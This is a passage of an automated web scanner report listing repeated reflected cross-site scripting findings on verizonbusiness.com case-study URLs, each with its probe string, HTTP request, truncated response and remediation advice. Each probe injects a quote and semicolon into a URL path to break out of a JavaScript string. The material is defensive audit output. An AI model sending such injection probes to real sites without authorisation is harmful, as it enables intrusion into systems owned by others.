hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resourcesbe033";75616d7df24/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv=
...[SNIP]...

1.758. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2034e'%3b12a357c2b15 was submitted in the REST URL parameter 1. This input was echoed as 2034e';12a357c2b15 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources2034e'%3b12a357c2b15/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:20 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40722
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:20 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:20 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources2034e';12a357c2b15/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.759. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59dea'%3b275f19d1fc1 was submitted in the REST URL parameter 2. This input was echoed as 59dea';275f19d1fc1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies59dea'%3b275f19d1fc1/cs_constellation-energy-power-of-choice_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:46 GMT
Content-Type: text/html
Content-Length: 40332
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:46 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/casestudies59dea';275f19d1fc1/cs_constellation-energy-power-of-choice_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.760. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9603b"%3bdde0253657a was submitted in the REST URL parameter 2. This input was echoed as 9603b";dde0253657a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies9603b"%3bdde0253657a/cs_constellation-energy-power-of-choice_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:37 GMT
Content-Type: text/html
Content-Length: 40332
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/casestudies9603b";dde0253657a/cs_constellation-energy-power-of-choice_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VA
...[SNIP]...

1.761. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73cc5'%3bf169b799b30 was submitted in the REST URL parameter 3. This input was echoed as 73cc5';f169b799b30 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf73cc5'%3bf169b799b30 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:12 GMT
Content-Type: text/html
Content-Length: 40334
Date: Wed, 17 Nov 2010 00:05:12 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf73cc5';f169b799b30'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.762. http://www.verizonbusiness.com/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1592b"%3b390b1708c56 was submitted in the REST URL parameter 3. This input was echoed as 1592b";390b1708c56 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf1592b"%3b390b1708c56 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:05:00 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40332
Date: Wed, 17 Nov 2010 00:05:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:05:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
USTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/casestudies/cs_constellation-energy-power-of-choice_en_xg.pdf1592b";390b1708c56";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.763. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 35db8"%3bee1ef8482ca was submitted in the REST URL parameter 1. This input was echoed as 35db8";ee1ef8482ca in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources35db8"%3bee1ef8482ca/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:59 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40760
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources35db8";ee1ef8482ca/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTIO
...[SNIP]...

1.764. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7f181'%3bd4a20962a13 was submitted in the REST URL parameter 1. This input was echoed as 7f181';d4a20962a13 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources7f181'%3bd4a20962a13/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:11 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40758
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:11 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:11 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources7f181';d4a20962a13/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.765. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31bf2'%3b47bdbe2e1c9 was submitted in the REST URL parameter 2. This input was echoed as 31bf2';47bdbe2e1c9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies31bf2'%3b47bdbe2e1c9/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:36 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40370
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:36 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:36 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/resources/casestudies31bf2';47bdbe2e1c9/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.766. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9595a"%3bae90b39e3fa was submitted in the REST URL parameter 2. This input was echoed as 9595a";ae90b39e3fa in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies9595a"%3bae90b39e3fa/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:26 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40370
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:04:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:26 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...
ch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/casestudies9595a";ae90b39e3fa/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
h
...[SNIP]...

1.767. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c1f2a'%3b183fd12aec4 was submitted in the REST URL parameter 3. This input was echoed as c1f2a';183fd12aec4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdfc1f2a'%3b183fd12aec4 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:59 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Content-Type: text/html
Content-Length: 40368
Date: Wed, 17 Nov 2010 00:04:59 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:59 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdfc1f2a';183fd12aec4'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.768. http://www.verizonbusiness.com/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdf

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f698a"%3b396859a35d6 was submitted in the REST URL parameter 3. This input was echoed as f698a";396859a35d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdff698a"%3b396859a35d6 HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:04:44 GMT
Content-Type: text/html
Content-Length: 40370
Date: Wed, 17 Nov 2010 00:04:44 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:04:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
x.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources/casestudies/cs_from-international-to-global-how-komatsu-used-strategy_en_xg.pdff698a";396859a35d6";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNCTION NAME

...[SNIP]...

1.769. http://www.verizonbusiness.com/resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /resources/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 402ac"%3b22bdcc78454 was submitted in the REST URL parameter 1. This input was echoed as 402ac";22bdcc78454 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /resources402ac"%3b22bdcc78454/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:03:43 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40714
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:03:43 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:03:43 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/resources402ac";22bdcc78454/casestudies/cs_mitsui-verizon-consolidating-it_en_xg.pdf";

hbx.pndef="title";//DEFAULT PAGE NAME
